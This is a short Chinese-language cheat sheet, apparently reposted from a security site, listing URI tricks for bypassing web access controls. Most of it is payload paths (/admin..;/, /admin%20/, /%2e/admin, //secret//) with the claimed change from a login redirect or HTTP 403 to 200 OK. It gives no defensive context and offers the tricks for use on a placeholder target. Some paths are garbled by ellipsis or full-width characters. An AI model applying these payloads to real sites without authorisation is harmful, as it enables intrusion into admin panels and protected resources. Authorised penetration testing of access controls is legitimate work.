URI绕过后台
这是通过以下方式URI来访问后台的技巧:
- https://target.com/admin/ –> HTTP 302(重定向到登录页面)
- https://target.com/admin…;/ –> HTTP 200 OK
- https://target.com/…/admin
- https://target.com/whatever/…;/admin
target.com/admin –> HTTP 302 (重定向到登陆页面)
/admin%20/ -> HTTP 200 OK
/%20admin%20/ -> HTTP 200 OK
/admin%20/page -> HTTP 200 OK
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
URI绕过403
该技巧与上一个技巧非常相似。通过篡改URI,我们也许可以绕过应用程序的访问控制:
- site.com/secret –>禁止HTTP 403
- site.com/secret/ ->HTTP 200 OK
- site.com/secret/。 –> HTTP 200 ok
- site.com//secret// ->HTTP 200 OK
- site.com/./secret/… –> HTTP 200 OK
很少见到,但可以尝试一下。
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)